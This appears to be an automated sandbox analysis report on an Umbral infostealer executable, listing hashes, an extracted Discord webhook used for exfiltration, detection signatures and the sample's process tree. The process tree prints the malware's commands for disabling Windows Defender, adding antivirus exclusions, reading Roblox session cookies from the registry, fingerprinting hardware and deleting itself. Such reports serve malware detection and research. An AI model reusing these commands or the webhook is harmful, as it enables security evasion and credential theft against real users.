Analysis
-
max time kernel
138s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
05-11-2023 03:19
General
-
Target
ConsoleApplication1.obf.exe
-
Size
424KB
-
MD5
9764ad0ba2c14105efa6cb7462beda58
-
SHA1
40c717e44479d0460a2b1789dbaf61a648b038a9
-
SHA256
52770ec8f2e84b3e264870a7533286670e61bff2c8932f0cd6cc1f60af3323ae
-
SHA512
d5a5313f377d17a21ec485b6e8ef6ccc02864b4cda1e8c4d47c790a60e3f0430a8fdf482fcfe116b52fb063f298abd594ff9167c68ffda23f0c69fb84d299309
-
SSDEEP
6144:hY2cJFqVZloZM9rIkd8g+EtXHkv/iD4ZZACl98e1mbiB8BOaedF6IxI:OpJFqVroZOL+EP8h7nuMawF6
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1170536634891128902/hdNxkvpSxRXfW2ouud2imDE8eFbcAfoi3fBBxpcoRyxI8E-rxHT7NHLuI-Q-ThYq7M3H
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/files/0x0007000000022cd4-7.dat family_umbral behavioral1/files/0x0007000000022cd4-8.dat family_umbral behavioral1/memory/1164-9-0x0000026E9C4A0000-0x0000026E9C4E0000-memory.dmp family_umbral -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe -
Executes dropped EXE 2 IoCs
pid Process 2732 5ZTQh4wkLLEAEmHun9jksi5UjDCx9RXL.exe 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 46 ip-api.com -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\System32\Speech\5ZTQh4wkLLEAEmHun9jksi5UjDCx9RXL.exe ConsoleApplication1.obf.exe File created C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe ConsoleApplication1.obf.exe File opened for modification C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe attrib.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3476 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4232 PING.EXE -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 4108 powershell.exe 4108 powershell.exe 4108 powershell.exe 4208 powershell.exe 4208 powershell.exe 4208 powershell.exe 2432 powershell.exe 2432 powershell.exe 2432 powershell.exe 4324 powershell.exe 4324 powershell.exe 4324 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe Token: SeDebugPrivilege 4108 powershell.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 2432 powershell.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeIncreaseQuotaPrivilege 524 wmic.exe Token: SeSecurityPrivilege 524 wmic.exe Token: SeTakeOwnershipPrivilege 524 wmic.exe Token: SeLoadDriverPrivilege 524 wmic.exe Token: SeSystemProfilePrivilege 524 wmic.exe Token: SeSystemtimePrivilege 524 wmic.exe Token: SeProfSingleProcessPrivilege 524 wmic.exe Token: SeIncBasePriorityPrivilege 524 wmic.exe Token: SeCreatePagefilePrivilege 524 wmic.exe Token: SeBackupPrivilege 524 wmic.exe Token: SeRestorePrivilege 524 wmic.exe Token: SeShutdownPrivilege 524 wmic.exe Token: SeDebugPrivilege 524 wmic.exe Token: SeSystemEnvironmentPrivilege 524 wmic.exe Token: SeRemoteShutdownPrivilege 524 wmic.exe Token: SeUndockPrivilege 524 wmic.exe Token: SeManageVolumePrivilege 524 wmic.exe Token: 33 524 wmic.exe Token: 34 524 wmic.exe Token: 35 524 wmic.exe Token: 36 524 wmic.exe Token: SeIncreaseQuotaPrivilege 524 wmic.exe Token: SeSecurityPrivilege 524 wmic.exe Token: SeTakeOwnershipPrivilege 524 wmic.exe Token: SeLoadDriverPrivilege 524 wmic.exe Token: SeSystemProfilePrivilege 524 wmic.exe Token: SeSystemtimePrivilege 524 wmic.exe Token: SeProfSingleProcessPrivilege 524 wmic.exe Token: SeIncBasePriorityPrivilege 524 wmic.exe Token: SeCreatePagefilePrivilege 524 wmic.exe Token: SeBackupPrivilege 524 wmic.exe Token: SeRestorePrivilege 524 wmic.exe Token: SeShutdownPrivilege 524 wmic.exe Token: SeDebugPrivilege 524 wmic.exe Token: SeSystemEnvironmentPrivilege 524 wmic.exe Token: SeRemoteShutdownPrivilege 524 wmic.exe Token: SeUndockPrivilege 524 wmic.exe Token: SeManageVolumePrivilege 524 wmic.exe Token: 33 524 wmic.exe Token: 34 524 wmic.exe Token: 35 524 wmic.exe Token: 36 524 wmic.exe Token: SeIncreaseQuotaPrivilege 1452 wmic.exe Token: SeSecurityPrivilege 1452 wmic.exe Token: SeTakeOwnershipPrivilege 1452 wmic.exe Token: SeLoadDriverPrivilege 1452 wmic.exe Token: SeSystemProfilePrivilege 1452 wmic.exe Token: SeSystemtimePrivilege 1452 wmic.exe Token: SeProfSingleProcessPrivilege 1452 wmic.exe Token: SeIncBasePriorityPrivilege 1452 wmic.exe Token: SeCreatePagefilePrivilege 1452 wmic.exe Token: SeBackupPrivilege 1452 wmic.exe Token: SeRestorePrivilege 1452 wmic.exe Token: SeShutdownPrivilege 1452 wmic.exe Token: SeDebugPrivilege 1452 wmic.exe Token: SeSystemEnvironmentPrivilege 1452 wmic.exe Token: SeRemoteShutdownPrivilege 1452 wmic.exe Token: SeUndockPrivilege 1452 wmic.exe Token: SeManageVolumePrivilege 1452 wmic.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 3096 wrote to memory of 2732 3096 ConsoleApplication1.obf.exe 87 PID 3096 wrote to memory of 2732 3096 ConsoleApplication1.obf.exe 87 PID 3096 wrote to memory of 2732 3096 ConsoleApplication1.obf.exe 87 PID 3096 wrote to memory of 1164 3096 ConsoleApplication1.obf.exe 89 PID 3096 wrote to memory of 1164 3096 ConsoleApplication1.obf.exe 89 PID 1164 wrote to memory of 4576 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 94 PID 1164 wrote to memory of 4576 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 94 PID 1164 wrote to memory of 4108 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 96 PID 1164 wrote to memory of 4108 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 96 PID 1164 wrote to memory of 4208 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 98 PID 1164 wrote to memory of 4208 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 98 PID 1164 wrote to memory of 2432 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 100 PID 1164 wrote to memory of 2432 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 100 PID 1164 wrote to memory of 4324 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 104 PID 1164 wrote to memory of 4324 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 104 PID 1164 wrote to memory of 524 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 108 PID 1164 wrote to memory of 524 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 108 PID 1164 wrote to memory of 1452 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 110 PID 1164 wrote to memory of 1452 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 110 PID 1164 wrote to memory of 2144 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 113 PID 1164 wrote to memory of 2144 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 113 PID 1164 wrote to memory of 2796 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 115 PID 1164 wrote to memory of 2796 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 115 PID 1164 wrote to memory of 3476 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 118 PID 1164 wrote to memory of 3476 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 118 PID 1164 wrote to memory of 4444 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 120 PID 1164 wrote to memory of 4444 1164 EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe 120 PID 4444 wrote to memory of 4232 4444 cmd.exe 122 PID 4444 wrote to memory of 4232 4444 cmd.exe 122 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4576 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe"C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe"1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\System32\Speech\5ZTQh4wkLLEAEmHun9jksi5UjDCx9RXL.exeC:\Windows\System32\Speech\5ZTQh4wkLLEAEmHun9jksi5UjDCx9RXL.exe2⤵
- Executes dropped EXE
PID:2732
-
-
C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exeC:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe"3⤵
- Drops file in System32 directory
- Views/modifies file attributes
PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:524
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2796
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:3476
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Windows\System32\Speech\EpPl64fqTTJX07HpZsliM0ggWmlF37o5.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:4232
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD534563f7b2b0a574673544f9feab79c4d
SHA1398679c5f01211593e396929552689a081e05ac2
SHA256af6b203e2923d35d9f583de8abe464b053f6ab32f5b91395eef32ac017de48f6
SHA5120f72fdcc99045e70a49dd8d2e2ee8b881a411cae08857d505218d0c81c6a2e2dd30bda3c4b6e9b976c129301496edaea93b30a565d8ee7c0da434a92a2bd84f5
-
Filesize
944B
MD559d97011e091004eaffb9816aa0b9abd
SHA11602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA25618f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6
-
Filesize
948B
MD57249f5c73fd4c203cc0b5d76b5d550e6
SHA1c36c86b0fff962ea5f44d40116554a8e7754a5d4
SHA256fd9b15f7b9f160af704090a1781a61943f27baab50a42c62ac7b6df9f415e17d
SHA51271a99f4051daa50099f26212d22920d38bde6ab1ee0f4f5a2a7dee312c49bb885e193fff1d218cb4f0980277b7b62d9801bf8cd7d356e5870e942989c920f346
-
Filesize
1KB
MD57164c3d7c57ebbaec233482f2e1cc1f1
SHA1a767f48a2a10c216470d0782100828f0bed91579
SHA25665ca843513f0f6ee03ae9b357fd6fea801a17ffe23c8a04777f8f06a5f0206ae
SHA512bc09ee737727408fa5a969a6eb2be0be83d521e4f3f6c0567e4caa28f09de2794d413fbef52a5a7243fb49005d69ab56052ce417440d07beadbc6684cb362951
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
11KB
MD5cebf7458dceffcbb81a290cf045beb27
SHA198c74fa610995d61d2ee78a2ea888e003e9f436d
SHA25697d22321ba783bf6d2119320d38d776bbc6bef42fe3dadecf512e23bbdd29660
SHA512144f0da1e8060e08340f1b349f7bbb17be298ee3d27d056d5603143125b8a9d7abb9485d0f5a2a26e2e50f0d5970ecf5fc3a9e665eece70414c6dc1504b04a91
-
Filesize
227KB
MD5ef2711e9aeeb23297016ef32b46a3c7e
SHA1ba51f478c1118d7803620367cb97ce2ceba52a5a
SHA2562fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759
SHA5123c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f
-
Filesize
227KB
MD5ef2711e9aeeb23297016ef32b46a3c7e
SHA1ba51f478c1118d7803620367cb97ce2ceba52a5a
SHA2562fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759
SHA5123c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f